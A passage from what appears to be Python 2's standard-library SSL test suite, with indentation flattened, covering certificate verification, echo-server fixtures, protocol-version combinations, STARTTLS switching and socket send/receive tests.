s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
with self.assertRaisesRegexp(ssl.SSLError, "No cipher can be selected"):
s.connect(remote)
@test_support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = ssl.wrap_socket(s)
wr = weakref.ref(ss)
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# The _delegate_methods in socket.py are correctly delegated to by an
# unconnected SSLSocket, so they will raise a socket.error rather than
# something unexpected like TypeError.
s = socket.socket(socket.AF_INET)
ss = ssl.wrap_socket(s)
self.assertRaises(socket.error, ss.recv, 1)
self.assertRaises(socket.error, ss.recv_into, bytearray(b'x'))
self.assertRaises(socket.error, ss.recvfrom, 1)
self.assertRaises(socket.error, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(socket.error, ss.send, b'x')
self.assertRaises(socket.error, ss.sendto, b'x', ('0.0.0.0', 0))
class NetworkedTests(unittest.TestCase):
def test_connect(self):
with test_support.transient_internet("svn.python.org"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE)
s.connect(("svn.python.org", 443))
c = s.getpeercert()
if c:
self.fail("Peer cert %s shouldn't be here!")
s.close()
# this should fail because we have no verification certs
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
try:
s.connect(("svn.python.org", 443))
except ssl.SSLError:
pass
finally:
s.close()
# this should succeed because we specify the root cert
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT)
try:
s.connect(("svn.python.org", 443))
finally:
s.close()
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
with test_support.transient_internet("svn.python.org"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT)
try:
self.assertEqual(0, s.connect_ex(("svn.python.org", 443)))
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
with test_support.transient_internet("svn.python.org"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT,
do_handshake_on_connect=False)
try:
s.setblocking(False)
rc = s.connect_ex(('svn.python.org', 443))
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLError as err:
if err.args[0] == ssl.SSL_ERROR_WANT_READ:
select.select([s], [], [], 5.0)
elif err.args[0] == ssl.SSL_ERROR_WANT_WRITE:
select.select([], [s], [], 5.0)
else:
raise
# SSL established
self.assertTrue(s.getpeercert())
finally:
s.close()
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
with test_support.transient_internet("svn.python.org"):
ss = ssl.wrap_socket(socket.socket(socket.AF_INET))
ss.connect(("svn.python.org", 443))
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
with test_support.transient_internet("svn.python.org"):
s = socket.socket(socket.AF_INET)
s.connect(("svn.python.org", 443))
s.setblocking(False)
s = ssl.wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLError, err:
if err.args[0] == ssl.SSL_ERROR_WANT_READ:
select.select([s], [], [])
elif err.args[0] == ssl.SSL_ERROR_WANT_WRITE:
select.select([], [s], [])
else:
raise
s.close()
if test_support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
with test_support.transient_internet("svn.python.org"):
pem = ssl.get_server_certificate(("svn.python.org", 443))
if not pem:
self.fail("No server certificate on svn.python.org:443!")
try:
pem = ssl.get_server_certificate(("svn.python.org", 443), ca_certs=CERTFILE)
except ssl.SSLError:
#should fail
pass
else:
self.fail("Got server certificate %s for svn.python.org!" % pem)
pem = ssl.get_server_certificate(("svn.python.org", 443), ca_certs=SVN_PYTHON_ORG_ROOT_CERT)
if not pem:
self.fail("No server certificate on svn.python.org:443!")
if test_support.verbose:
sys.stdout.write("\nVerified certificate for svn.python.org:443 is\n%s\n" % pem)
def test_algorithms(self):
# Issue #8484: all algorithms should be available when verifying a
# certificate.
# SHA256 was added in OpenSSL 0.9.8
if ssl.OPENSSL_VERSION_INFO < (0, 9, 8, 0, 15):
self.skipTest("SHA256 not available on %r" % ssl.OPENSSL_VERSION)
self.skipTest("remote host needs SNI, only available on Python 3.2+")
# NOTE: https://sha2.hboeck.de is another possible test host
remote = ("sha256.tbs-internet.com", 443)
sha256_cert = os.path.join(os.path.dirname(__file__), "sha256.pem")
with test_support.transient_internet("sha256.tbs-internet.com"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=sha256_cert,)
try:
s.connect(remote)
if test_support.verbose:
sys.stdout.write("\nCipher with %r is %r\n" %
(remote, s.cipher()))
sys.stdout.write("Certificate is:\n%s\n" %
pprint.pformat(s.getpeercert()))
finally:
s.close()
try:
import threading
except ImportError:
_have_threads = False
else:
_have_threads = True
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock):
self.server = server
self.running = False
self.sock = connsock
self.sock.setblocking(1)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def show_conn_details(self):
if self.server.certreqs == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if test_support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if test_support.verbose and self.server.chatty:
sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
if test_support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
def wrap_conn(self):
try:
self.sslconn = ssl.wrap_socket(self.sock, server_side=True,
certfile=self.server.certificate,
ssl_version=self.server.protocol,
ca_certs=self.server.cacerts,
cert_reqs=self.server.certreqs,
ciphers=self.server.ciphers)
except ssl.SSLError as e:
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
self.server.conn_errors.append(e)
if self.server.chatty:
handle_error("\n server: bad connection attempt from " +
str(self.sock.getpeername()) + ":\n")
self.close()
self.running = False
self.server.stop()
return False
else:
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock._sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if isinstance(self.sock, ssl.SSLSocket):
self.sslconn = self.sock
elif not self.wrap_conn():
return
self.show_conn_details()
while self.running:
try:
msg = self.read()
if not msg:
# eof, so quit this handler
self.running = False
self.close()
elif msg.strip() == 'over':
if test_support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif self.server.starttls_server and msg.strip() == 'STARTTLS':
if test_support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write("OK\n")
if not self.wrap_conn():
return
elif self.server.starttls_server and self.sslconn and msg.strip() == 'ENDTLS':
if test_support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write("OK\n")
self.sslconn.unwrap()
self.sslconn = None
if test_support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
else:
if (test_support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %s (%s), sending back %s (%s)...\n"
% (repr(msg), ctype, repr(msg.lower()), ctype))
self.write(msg.lower())
except ssl.SSLError:
if self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
wrap_accepting_socket=False, ciphers=None):
if ssl_version is None:
ssl_version = ssl.PROTOCOL_TLSv1
if certreqs is None:
certreqs = ssl.CERT_NONE
self.certificate = certificate
self.protocol = ssl_version
self.certreqs = certreqs
self.cacerts = cacerts
self.ciphers = ciphers
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.flag = None
if wrap_accepting_socket:
self.sock = ssl.wrap_socket(self.sock, server_side=True,
certfile=self.certificate,
cert_reqs = self.certreqs,
ca_certs = self.cacerts,
ssl_version = self.protocol,
ciphers = self.ciphers)
if test_support.verbose and self.chatty:
sys.stdout.write(' server: wrapped server socket as %s\n' % str(self.sock))
self.port = test_support.bind_port(self.sock)
self.active = False
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(0.05)
self.sock.listen(5)
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if test_support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ str(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn)
handler.start()
handler.join()
except socket.timeout:
pass
except KeyboardInterrupt:
self.stop()
self.sock.close()
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
class EchoServer(asyncore.dispatcher):
class ConnectionHandler(asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
asyncore.dispatcher_with_send.__init__(self, conn)
self.socket = ssl.wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
self._ssl_accepting = True
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except ssl.SSLError, err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return
elif err.args[0] == ssl.SSL_ERROR_EOF:
return self.handle_close()
raise
except socket.error, err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if data and data.strip() != 'over':
self.send(data.lower())
def handle_close(self):
self.close()
if test_support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
asyncore.dispatcher.__init__(self)
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = test_support.bind_port(self.socket)
self.listen(5)
def handle_accept(self):
sock_obj, addr = self.accept()
if test_support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if test_support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if test_support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if test_support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
asyncore.loop(0.05)
def stop(self):
self.active = False
self.server.close()
class SocketServerHTTPSServer(threading.Thread):
class HTTPSServer(HTTPServer):
def __init__(self, server_address, RequestHandlerClass, certfile):
HTTPServer.__init__(self, server_address, RequestHandlerClass)
# we assume the certfile contains both private key and certificate
self.certfile = certfile
self.allow_reuse_address = True
def __str__(self):
return ('<%s %s:%s>' %
(self.__class__.__name__,
self.server_name,
self.server_port))
def get_request(self):
# override this to wrap socket with SSL
sock, addr = self.socket.accept()
sslconn = ssl.wrap_socket(sock, server_side=True,
certfile=self.certfile)
return sslconn, addr
class RootedHTTPRequestHandler(SimpleHTTPRequestHandler):
# need to override translate_path to get a known root,
# instead of using os.curdir, since the test could be
# run from anywhere
server_version = "TestHTTPS/1.0"
root = None
def translate_path(self, path):
"""Translate a /-separated PATH to the local filename syntax.
Components that mean special things to the local file system
(e.g. drive or directory names) are ignored. (XXX They should
probably be diagnosed.)
"""
# abandon query parameters
path = urlparse.urlparse(path)[2]
path = os.path.normpath(urllib.unquote(path))
words = path.split('/')
words = filter(None, words)
path = self.root
for word in words:
drive, word = os.path.splitdrive(word)
head, word = os.path.split(word)
if word in self.root: continue
path = os.path.join(path, word)
return path
def log_message(self, format, *args):
# we override this to suppress logging unless "verbose"
if test_support.verbose:
sys.stdout.write(" server (%s:%d %s):\n [%s] %s\n" %
(self.server.server_address,
self.server.server_port,
self.request.cipher(),
self.log_date_time_string(),
format%args))
def __init__(self, certfile):
self.flag = None
self.RootedHTTPRequestHandler.root = os.path.split(CERTFILE)[0]
self.server = self.HTTPSServer(
(HOST, 0), self.RootedHTTPRequestHandler, certfile)
self.port = self.server.server_port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
if self.flag:
self.flag.set()
self.server.serve_forever(0.05)
def stop(self):
self.server.shutdown()
def bad_cert_test(certfile):
"""
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with the given client certificate fails.
"""
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_REQUIRED,
cacerts=CERTFILE, chatty=False)
with server:
try:
s = ssl.wrap_socket(socket.socket(),
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
except ssl.SSLError, x:
if test_support.verbose:
sys.stdout.write("\nSSLError is %s\n" % x[1])
except socket.error, x:
if test_support.verbose:
sys.stdout.write("\nsocket.error is %s\n" % x[1])
else:
raise AssertionError("Use of invalid cert should have failed!")
def server_params_test(certfile, protocol, certreqs, cacertsfile,
client_certfile, client_protocol=None, indata="FOO\n",
ciphers=None, chatty=True, connectionchatty=False,
wrap_accepting_socket=False):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
server = ThreadedEchoServer(certfile,
certreqs=certreqs,
ssl_version=protocol,
cacerts=cacertsfile,
ciphers=ciphers,
chatty=chatty,
connectionchatty=connectionchatty,
wrap_accepting_socket=wrap_accepting_socket)
with server:
# try to connect
if client_protocol is None:
client_protocol = protocol
s = ssl.wrap_socket(socket.socket(),
certfile=client_certfile,
ca_certs=cacertsfile,
ciphers=ciphers,
cert_reqs=certreqs,
ssl_version=client_protocol)
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if test_support.verbose:
sys.stdout.write(
" client: sending %s...\n" % (repr(arg)))
s.write(arg)
outdata = s.read()
if connectionchatty:
if test_support.verbose:
sys.stdout.write(" client: read %s\n" % repr(outdata))
if outdata != indata.lower():
raise AssertionError(
"bad data <<%s>> (%d) received; expected <<%s>> (%d)\n"
% (outdata[:min(len(outdata),20)], len(outdata),
indata[:min(len(indata),20)].lower(), len(indata)))
s.write("over\n")
if connectionchatty:
if test_support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
def try_protocol_combo(server_protocol,
client_protocol,
expect_success,
certsreqs=None):
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if test_support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
try:
# NOTE: we must enable "ALL" ciphers, otherwise an SSLv23 client
# will send an SSLv3 hello (rather than SSLv2) starting from
# OpenSSL 1.0.0 (see issue #8322).
server_params_test(CERTFILE, server_protocol, certsreqs,
CERTFILE, CERTFILE, client_protocol,
ciphers="ALL", chatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except socket.error as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
class ThreadedTests(unittest.TestCase):
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an IOError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = test_support.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen(5)
listener_ready.set()
s.accept()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
c = socket.socket()
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = ssl.wrap_socket(c)
except IOError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
@skip_if_broken_ubuntu_ssl
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if test_support.verbose:
sys.stdout.write("\n")
server_params_test(CERTFILE, ssl.PROTOCOL_TLSv1, ssl.CERT_NONE,
CERTFILE, CERTFILE, ssl.PROTOCOL_TLSv1,
chatty=True, connectionchatty=True)
def test_getpeercert(self):
if test_support.verbose:
sys.stdout.write("\n")
s2 = socket.socket()
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_SSLv23,
cacerts=CERTFILE,
chatty=False)
with server:
s = ssl.wrap_socket(socket.socket(),
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_REQUIRED,
ssl_version=ssl.PROTOCOL_SSLv23)
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if test_support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
s.close()
def test_empty_cert(self):
"""Connecting with an empty cert file"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"nullcert.pem"))
def test_malformed_cert(self):
"""Connecting with a badly formatted certificate (syntax error)"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"badcert.pem"))
def test_nonexisting_cert(self):
"""Connecting with a non-existing cert file"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"wrongcert.pem"))
def test_malformed_key(self):
"""Connecting with a badly formatted key (syntax error)"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"badkey.pem"))
@skip_if_broken_ubuntu_ssl
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if test_support.verbose:
sys.stdout.write("\n")
if not hasattr(ssl, 'PROTOCOL_SSLv2'):
self.skipTest("PROTOCOL_SSLv2 needed")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
@skip_if_broken_ubuntu_ssl
def test_protocol_sslv23(self):
"""Connecting to an SSLv23 server with various client options"""
if test_support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, True)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, True)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, True, ssl.CERT_REQUIRED)
@skip_if_broken_ubuntu_ssl
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if test_support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, True)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, True, ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
@skip_if_broken_ubuntu_ssl
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if test_support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, True)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, True, ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = ("msg 1", "MSG 2", "STARTTLS", "MSG 3", "msg 4", "ENDTLS", "msg 5", "msg 6")
server = ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(1)
s.connect((HOST, server.port))
if test_support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if test_support.verbose:
sys.stdout.write(
" client: sending %s...\n" % repr(indata))
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
if (indata == "STARTTLS" and
outdata.strip().lower().startswith("ok")):
# STARTTLS ok, switch to secure mode
if test_support.verbose:
sys.stdout.write(
" client: read %s from server, starting TLS...\n"
% repr(outdata))
conn = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
wrapped = True
elif (indata == "ENDTLS" and
outdata.strip().lower().startswith("ok")):
# ENDTLS ok, switch back to clear text
if test_support.verbose:
sys.stdout.write(
" client: read %s from server, ending TLS...\n"
% repr(outdata))
s = conn.unwrap()
wrapped = False
else:
if test_support.verbose:
sys.stdout.write(
" client: read %s from server\n" % repr(outdata))
if test_support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write("over\n")
else:
s.send("over\n")
s.close()
def test_socketserver(self):
"""Using a SocketServer to create and manage SSL connections."""
server = SocketServerHTTPSServer(CERTFILE)
flag = threading.Event()
server.start(flag)
# wait for it to start
flag.wait()
# try to connect
try:
if test_support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://127.0.0.1:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
with test_support.check_py3k_warnings():
f = urllib.urlopen(url)
dlen = f.info().getheader("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if test_support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
f.close()
self.assertEqual(d1, d2)
finally:
server.stop()
server.join()
def test_wrapped_accept(self):
"""Check the accept() method on SSL sockets."""
if test_support.verbose:
sys.stdout.write("\n")
server_params_test(CERTFILE, ssl.PROTOCOL_SSLv23, ssl.CERT_REQUIRED,
CERTFILE, CERTFILE, ssl.PROTOCOL_SSLv23,
chatty=True, connectionchatty=True,
wrap_accepting_socket=True)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
indata = "TEST MESSAGE of mixed case\n"
if test_support.verbose:
sys.stdout.write("\n")
server = AsyncoreEchoServer(CERTFILE)
with server:
s = ssl.wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if test_support.verbose:
sys.stdout.write(
" client: sending %s...\n" % (repr(indata)))
s.write(indata)
outdata = s.read()
if test_support.verbose:
sys.stdout.write(" client: read %s\n" % repr(outdata))
if outdata != indata.lower():
self.fail(
"bad data <<%s>> (%d) received; expected <<%s>> (%d)\n"
% (outdata[:min(len(outdata),20)], len(outdata),
indata[:min(len(indata),20)].lower(), len(indata)))
s.write("over\n")
if test_support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
def test_recv_send(self):
"""Test recv(), send() and friends."""
if test_support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray("\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray("\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, whether to expect success, *args)
send_methods = [
('send', s.send, True, []),
('sendto', s.sendto, False, ["some.address"]),
('sendall', s.sendall, True, []),
]
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = u"PREFIX_"
for meth_name, send_meth, expect_success, args in send_methods:
indata = data_prefix + meth_name
try:
send_meth(indata.encode('ASCII', 'strict'), *args)
outdata = s.read()
outdata = outdata.decode('ASCII', 'strict')
if outdata != indata.lower():
self.fail(
"While sending with <<%s>> bad data "
"<<%r>> (%d) received; "
"expected <<%r>> (%d)\n" % (
meth_name, outdata[:20], len(outdata),
indata[:20], len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<%s>>; "
"expected to succeed.\n" % (meth_name,)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<%s>> failed with unexpected "
"exception message: %s\n" % (
meth_name, e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = data_prefix + meth_name
try:
s.send(indata.encode('ASCII', 'strict'))
outdata = recv_meth(*args)
outdata = outdata.decode('ASCII', 'strict')
if outdata != indata.lower():
self.fail(
"While receiving with <<%s>> bad data "
"<<%r>> (%d) received; "
"expected <<%r>> (%d)\n" % (
meth_name, outdata[:20], len(outdata),
indata[:20], len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<%s>>; "
"expected to succeed.\n" % (meth_name,)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<%s>> failed with unexpected "
"exception message: %s\n" % (
meth_name, e
)
)
# consume data
s.read()
s.write("over\n".encode("ASCII", "strict"))
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
